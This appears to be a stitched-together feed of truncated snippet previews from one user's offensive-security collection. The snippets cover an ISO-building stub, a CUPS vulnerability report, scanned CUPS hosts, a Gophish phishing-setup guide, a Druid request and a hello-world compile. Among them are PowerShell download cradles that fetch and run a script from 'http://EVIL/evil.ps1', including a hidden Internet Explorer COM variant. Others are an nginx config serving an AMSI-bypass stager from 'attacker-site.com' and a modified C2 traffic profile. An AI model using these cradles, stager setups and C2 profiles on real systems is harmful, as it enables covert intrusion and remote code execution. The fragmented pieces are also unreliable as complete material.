CalfCrusher

# pip install pycdlib

try:
    from cStringIO import StringIO as BytesIO
except ImportError:
    from io import BytesIO

import pycdlib

iso = pycdlib.PyCdlib()

CalfCrusher

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

CalfCrusher

list of contents

• Infrastructure
  • Redirectors
  • Domain fronting
• OpSec
  • Customer ID
• Payloads
  • DNS Beacon
• SMB Beacon

CalfCrusher

Original report

• Affected Vendor: OpenPrinting
• Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
• Affected Version: All versions <= 2.0.1 (latest release) and master.
• Significant ICS/OT impact? no
• Reporter: Simone Margaritelli [evilsocket@gmail.com]
• Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:

• https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8

CalfCrusher

ip,user_agent
116.202.x.x,CUPS/2.2.10 (Linux 4.19.0-17-amd64; x86_64) IPP/2.0
212.235.x.x,CUPS/2.2.7 (Linux 4.15.0-213-generic; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
5.9.x.x,CUPS/2.2.7 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
147.203.x.x,CUPS/2.2.7 (Linux 4.15.0-176-generic; x86_64) IPP/2.0
60.191.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
64.62.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
103.234.x.x,CUPS/2.4.1 (Linux 5.15.0-118-generic; x86_64) IPP/2.0

CalfCrusher

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+

CalfCrusher

POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close

CalfCrusher

limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;

server {
    root /var/www/attacker-site.com/html;
    index index.html;
    server_name attacker-site.com www.attacker-site.com;
    location / {
        try_files $uri $uri/ =404;
    }
    location = /bypassamsiandrequeststager.txt {

CalfCrusher

#
# Modified Amazon browsing traffic profile
# 

set sleeptime "10000";  # Increased sleep time to 10 seconds
set jitter    "500";    # Increased jitter to 500 milliseconds
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent

http-get {

CalfCrusher

Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;

public class Hello {
    public static void Main(string[] Args) {
        System.Console.WriteLine("Hello, world!");
        System.Console.Read();
    }
}
'@